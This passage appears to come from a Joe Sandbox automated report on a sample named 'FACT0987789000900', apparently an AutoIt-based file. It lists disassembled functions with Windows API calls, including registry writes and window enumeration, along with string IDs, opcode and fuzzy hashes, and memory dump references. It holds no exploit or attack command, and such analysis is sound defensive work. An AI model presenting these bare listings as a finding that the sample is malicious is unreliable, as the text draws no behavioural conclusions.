                                                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 004F785D
                                                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004F787B
                                                                                                                • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 004F78A1
                                                                                                                • SendMessageW.USER32(?,00000421,?,?), ref: 004F78B6
                                                                                                                • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 004F78C9
                                                                                                                • IsWindowVisible.USER32(?), ref: 004F78E9
                                                                                                                • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 004F7904
                                                                                                                • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 004F7918
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004F7930
                                                                                                                • MonitorFromPoint.USER32(?,?,00000002), ref: 004F7956
                                                                                                                • GetMonitorInfoW.USER32 ref: 004F7970
                                                                                                                • CopyRect.USER32(?,?), ref: 004F7987
                                                                                                                • SendMessageW.USER32(?,00000412,00000000), ref: 004F79F2
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                • String ID: ($0$tooltips_class32
                                                                                                                • API String ID: 698492251-4156429822
                                                                                                                • Opcode ID: f87d016d0e7d94704b88bc71f6bc4d531aa7f3c53e050152704f882c6c19e183
                                                                                                                • Instruction ID: 28020f596f8aa628ef4a5c7f8c7f6a50c8544f7268b4f071ba1f7cf60166a63d
                                                                                                                • Opcode Fuzzy Hash: f87d016d0e7d94704b88bc71f6bc4d531aa7f3c53e050152704f882c6c19e183
                                                                                                                • Instruction Fuzzy Hash: 67B1A271608301AFDB04DF65C948B6BBBE5FF88314F00892EF5999B291D778E805CB96
                                                                                                                APIs
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004AA939
                                                                                                                • GetSystemMetrics.USER32(00000007), ref: 004AA941
                                                                                                                • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 004AA96C
                                                                                                                • GetSystemMetrics.USER32(00000008), ref: 004AA974
                                                                                                                • GetSystemMetrics.USER32(00000004), ref: 004AA999
                                                                                                                • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 004AA9B6
                                                                                                                • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 004AA9C6
                                                                                                                • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 004AA9F9
                                                                                                                • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 004AAA0D
                                                                                                                • GetClientRect.USER32(00000000,000000FF), ref: 004AAA2B
                                                                                                                • GetStockObject.GDI32(00000011), ref: 004AAA47
                                                                                                                • SendMessageW.USER32(00000000,00000030,00000000), ref: 004AAA52
                                                                                                                  • Part of subcall function 004AB63C: GetCursorPos.USER32(000000FF), ref: 004AB64F
                                                                                                                  • Part of subcall function 004AB63C: ScreenToClient.USER32(00000000,000000FF), ref: 004AB66C
                                                                                                                  • Part of subcall function 004AB63C: GetAsyncKeyState.USER32(00000001), ref: 004AB691
                                                                                                                  • Part of subcall function 004AB63C: GetAsyncKeyState.USER32(00000002), ref: 004AB69F
                                                                                                                • SetTimer.USER32(00000000,00000000,00000028,004AAB87), ref: 004AAA79
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                • String ID: AutoIt v3 GUI
                                                                                                                • API String ID: 1458621304-248962490
                                                                                                                • Opcode ID: e5c0a5e881467d5fa55a503417352a5960236f923028345d46c2ec31a9225720
                                                                                                                • Instruction ID: d41f6ccd04831fa241b8fbd2f1ed16100a43c37288256d38405a3870befaac53
                                                                                                                • Opcode Fuzzy Hash: e5c0a5e881467d5fa55a503417352a5960236f923028345d46c2ec31a9225720
                                                                                                                • Instruction Fuzzy Hash: 6EB1D071A0020AAFDB14DFA8CC45BEE7BB4FB28315F11421AFA05A72D0DB78D851DB65
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscat$A1560_wcscmp_wcscpy_wcsncpy_wcsstr
                                                                                                                • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                                                                                                • API String ID: 3483108802-1459072770
                                                                                                                • Opcode ID: b1215158f95e87efff87a76551cda1b623263967e2230fd2af7e8cc6e8a19256
                                                                                                                • Instruction ID: 508312395892924be709d77867f97f51d51fbf187a569c9bca578752d95eb1df
                                                                                                                • Opcode Fuzzy Hash: b1215158f95e87efff87a76551cda1b623263967e2230fd2af7e8cc6e8a19256
                                                                                                                • Instruction Fuzzy Hash: E541D671A002007BEB00AB65DC56EFF7B7CEF55754F04002FF901B2292EB78AA0596B9
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$Foreground
                                                                                                                • String ID: ACTIVE$ALL$CLASS$HANDLE$INSTANCE$LAST$REGEXPCLASS$REGEXPTITLE$TITLE
                                                                                                                • API String ID: 62970417-1919597938
                                                                                                                • Opcode ID: aa48d21b25ebbd0a1c0a26fdc7c6e450dd1e6dfcf5ae9ee64638d3abeb28978b
                                                                                                                • Instruction ID: f4a460f55679e10d0314f7c807248209f8d019bda26ddd3aae321b43293c6e3b
                                                                                                                • Opcode Fuzzy Hash: aa48d21b25ebbd0a1c0a26fdc7c6e450dd1e6dfcf5ae9ee64638d3abeb28978b
                                                                                                                • Instruction Fuzzy Hash: A5D1D330104642ABCB04EF51C485A9EBFB0FF64348F504E2EF45A571E2DB34E99ADB95
                                                                                                                APIs
                                                                                                                • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004F3735
                                                                                                                • RegCreateKeyExW.ADVAPI32(?,?,00000000,0052DC00,00000000,?,00000000,?,?), ref: 004F37A3
                                                                                                                • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 004F37EB
                                                                                                                • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 004F3874
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 004F3B94
                                                                                                                • RegCloseKey.ADVAPI32(00000000), ref: 004F3BA1
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Close$ConnectCreateRegistryValue
                                                                                                                • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                • API String ID: 536824911-966354055
                                                                                                                • Opcode ID: 41ba7da86da8382a8e6c9b9bd85f75419151312f088b823863dd62c627cb9597
                                                                                                                • Instruction ID: c2c7f3a1baff6c58399d394f20ffbc83fa3d38024a307a9eee50769a76a3e362
                                                                                                                • Opcode Fuzzy Hash: 41ba7da86da8382a8e6c9b9bd85f75419151312f088b823863dd62c627cb9597
                                                                                                                • Instruction Fuzzy Hash: 0C028F752006019FCB14EF29C855E2AB7E5FF89724F04845EF9499B3A1DB39ED01CB89
                                                                                                                APIs
                                                                                                                • CharUpperBuffW.USER32(?,?), ref: 004F6C56
                                                                                                                • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 004F6D16
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: BuffCharMessageSendUpper
                                                                                                                • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                • API String ID: 3974292440-719923060
                                                                                                                • Opcode ID: 6bf44864d9239308a065a5d54582aca44bcd3ec90daeea5cfdeee581b8a62b0c
                                                                                                                • Instruction ID: 31f8acd799c2da2a5e597649626316a1f39aca05eb8fad366e354e73389eb467
                                                                                                                • Opcode Fuzzy Hash: 6bf44864d9239308a065a5d54582aca44bcd3ec90daeea5cfdeee581b8a62b0c
                                                                                                                • Instruction Fuzzy Hash: F3A1D1302042459BCB14EF25C852A7BB7A1FF54318F11496EB9A65B3D2DB38EC06CB89
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 004CCF91
                                                                                                                • __swprintf.LIBCMT ref: 004CD032
                                                                                                                • _wcscmp.LIBCMT ref: 004CD045
                                                                                                                • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 004CD09A
                                                                                                                • _wcscmp.LIBCMT ref: 004CD0D6
                                                                                                                • GetClassNameW.USER32(?,?,00000400), ref: 004CD10D
                                                                                                                • GetDlgCtrlID.USER32(?), ref: 004CD15F
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004CD195
                                                                                                                • GetParent.USER32(?), ref: 004CD1B3
                                                                                                                • ScreenToClient.USER32(00000000), ref: 004CD1BA
                                                                                                                • GetClassNameW.USER32(?,?,00000100), ref: 004CD234
                                                                                                                • _wcscmp.LIBCMT ref: 004CD248
                                                                                                                • GetWindowTextW.USER32(?,?,00000400), ref: 004CD26E
                                                                                                                • _wcscmp.LIBCMT ref: 004CD282
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                • String ID: %s%u
                                                                                                                • API String ID: 3119225716-679674701
                                                                                                                • Opcode ID: 4eb2daf11c34e5dd4b032a8c85e7f67d42afbd1d790662cb2912152fc4c2402a
                                                                                                                • Instruction ID: b65d4f0912f58f67dcab444feaca2cb514eb014fd87708e617df74efbfd8af10
                                                                                                                • Opcode Fuzzy Hash: 4eb2daf11c34e5dd4b032a8c85e7f67d42afbd1d790662cb2912152fc4c2402a
                                                                                                                • Instruction Fuzzy Hash: 13A1CF75A04302ABD755DF64C884FEBB7A8FF44344F00852FF99992290DB38EA05CBA5
                                                                                                                APIs
                                                                                                                • GetClassNameW.USER32(00000008,?,00000400), ref: 004CD8EB
                                                                                                                • _wcscmp.LIBCMT ref: 004CD8FC
                                                                                                                • GetWindowTextW.USER32(00000001,?,00000400), ref: 004CD924
                                                                                                                • CharUpperBuffW.USER32(?,00000000), ref: 004CD941
                                                                                                                • _wcscmp.LIBCMT ref: 004CD95F
                                                                                                                • _wcsstr.LIBCMT ref: 004CD970
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 004CD9A8
                                                                                                                • _wcscmp.LIBCMT ref: 004CD9B8
                                                                                                                • GetWindowTextW.USER32(00000002,?,00000400), ref: 004CD9DF
                                                                                                                • GetClassNameW.USER32(00000018,?,00000400), ref: 004CDA28
                                                                                                                • _wcscmp.LIBCMT ref: 004CDA38
                                                                                                                • GetClassNameW.USER32(00000010,?,00000400), ref: 004CDA60
                                                                                                                • GetWindowRect.USER32(00000004,?), ref: 004CDAC9
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                • String ID: @$ThumbnailClass
                                                                                                                • API String ID: 1788623398-1539354611
                                                                                                                • Opcode ID: e882614a174d0634cd889336768ef08b3a8ae2fd7ef40746a7d08cdea7b16cf2
                                                                                                                • Instruction ID: e6dc000262b4cd041ef96954a909ef04c03fba6ff0790659a1199c04b8f90049
                                                                                                                • Opcode Fuzzy Hash: e882614a174d0634cd889336768ef08b3a8ae2fd7ef40746a7d08cdea7b16cf2
                                                                                                                • Instruction Fuzzy Hash: EF81B0754082059BDB45DF10C881FAB7BA8EF84318F04847FFD899A196EB38ED45CBA5
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                • API String ID: 1038674560-1810252412
                                                                                                                • Opcode ID: 12e0d7123671e58ff93c06b7bdda92218bca3d4816e6b70282f63a02f408b541
                                                                                                                • Instruction ID: 82500c77b9ba3a2699a7b3f8f2f1683eb976f9f135e14115d27e0b7bd7474e0d
                                                                                                                • Opcode Fuzzy Hash: 12e0d7123671e58ff93c06b7bdda92218bca3d4816e6b70282f63a02f408b541
                                                                                                                • Instruction Fuzzy Hash: C731A135A44215A6DF14FB51DD93FEE7B74AF20708F60003FF451710E1EB69AE058669
                                                                                                                APIs
                                                                                                                • LoadIconW.USER32(00000063), ref: 004CEAB0
                                                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004CEAC2
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004CEAD9
                                                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004CEAEE
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004CEAF4
                                                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004CEB04
                                                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004CEB0A
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004CEB2B
                                                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004CEB45
                                                                                                                • GetWindowRect.USER32(?,?), ref: 004CEB4E
                                                                                                                • SetWindowTextW.USER32(?,?), ref: 004CEBB9
                                                                                                                • GetDesktopWindow.USER32 ref: 004CEBBF
                                                                                                                • GetWindowRect.USER32(00000000), ref: 004CEBC6
                                                                                                                • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 004CEC12
                                                                                                                • GetClientRect.USER32(?,?), ref: 004CEC1F
                                                                                                                • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 004CEC44
                                                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004CEC6F
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                • String ID:
                                                                                                                • API String ID: 3869813825-0
                                                                                                                • Opcode ID: 02c1da482c2366b8ec8a6315770c97d3b22b8fb671bbe9ff66674cebc3d3f3b3
                                                                                                                • Instruction ID: 17448ce93be80f5a82230557fb0f2c4887c9ef1368e52971f9ffa8e61b004399
                                                                                                                • Opcode Fuzzy Hash: 02c1da482c2366b8ec8a6315770c97d3b22b8fb671bbe9ff66674cebc3d3f3b3
                                                                                                                • Instruction Fuzzy Hash: 92514B75900709AFDB20DFA9CD89FAEBBB5FB04704F00491DE546A26A0D778B944DB14
                                                                                                                APIs
                                                                                                                • LoadCursorW.USER32(00000000,00007F8A), ref: 004E79C6
                                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 004E79D1
                                                                                                                • LoadCursorW.USER32(00000000,00007F03), ref: 004E79DC
                                                                                                                • LoadCursorW.USER32(00000000,00007F8B), ref: 004E79E7
                                                                                                                • LoadCursorW.USER32(00000000,00007F01), ref: 004E79F2
                                                                                                                • LoadCursorW.USER32(00000000,00007F81), ref: 004E79FD
                                                                                                                • LoadCursorW.USER32(00000000,00007F88), ref: 004E7A08
                                                                                                                • LoadCursorW.USER32(00000000,00007F80), ref: 004E7A13
                                                                                                                • LoadCursorW.USER32(00000000,00007F86), ref: 004E7A1E
                                                                                                                • LoadCursorW.USER32(00000000,00007F83), ref: 004E7A29
                                                                                                                • LoadCursorW.USER32(00000000,00007F85), ref: 004E7A34
                                                                                                                • LoadCursorW.USER32(00000000,00007F82), ref: 004E7A3F
                                                                                                                • LoadCursorW.USER32(00000000,00007F84), ref: 004E7A4A
                                                                                                                • LoadCursorW.USER32(00000000,00007F04), ref: 004E7A55
                                                                                                                • LoadCursorW.USER32(00000000,00007F02), ref: 004E7A60
                                                                                                                • LoadCursorW.USER32(00000000,00007F89), ref: 004E7A6B
                                                                                                                • GetCursorInfo.USER32(?), ref: 004E7A7B
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.1296081222.0000000000491000.00000040.00000001.01000000.00000004.sdmp, Offset: 00490000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.1296058465.0000000000490000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000053E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000054A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.000000000055A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1296081222.00000000005A9000.00000040.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297030447.00000000005AF000.00000080.00000001.01000000.00000004.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.1297316157.00000000005B1000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_490000_FACT0987789000900.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Cursor$Load$Info
                                                                                                                • String ID:
                                                                                                                • API String ID: 2577412497-0
                                                                                                                • Opcode ID: 8d424038f65319e4171550a2e2103ad223024319816f18b6b81835c43e2760ee
                                                                                                                • Instruction ID: f07159a6bc42fd0d98324103aac7ae308168453f1c99c7f35b6e88e95c17b474
                                                                                                                • Opcode Fuzzy Hash: 8d424038f65319e4171550a2e2103ad223024319816f18b6b81835c43e2760ee
                                                                                                                • Instruction Fuzzy Hash: F93116B1D083196ADB109FB69C8995FBFE8FF04764F50453BA50DE7280DA7CA5008FA5
                                                                                                                APIs
                                                                                                                  • Part of subcall function 004AE968: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,0049C8B7,?,00002000,?,?,00000000,?,0049419E,?,?,?,0052DC00), ref: 004AE984
                                                                                                                  • Part of subcall function 0049660F: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004953B1,?,?,004961FF,?,00000000,00000001,00000000), ref: 0049662F
                                                                                                                • __wsplitpath.LIBCMT ref: 0049C93E
                                                                                                                  • Part of subcall function 004B1DFC: __wsplitpath_helper.LIBCMT ref: 004B1E3C
                                                                                                                • _wcscpy.LIBCMT ref: 0049C953
                                                                                                                • _wcscat.LIBCMT ref: 0049C968
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,00000001,?,?,00000000), ref: 0049C978
                                                                                                                • SetCurrentDirectoryW.KERNEL32(?), ref: 0049CABE
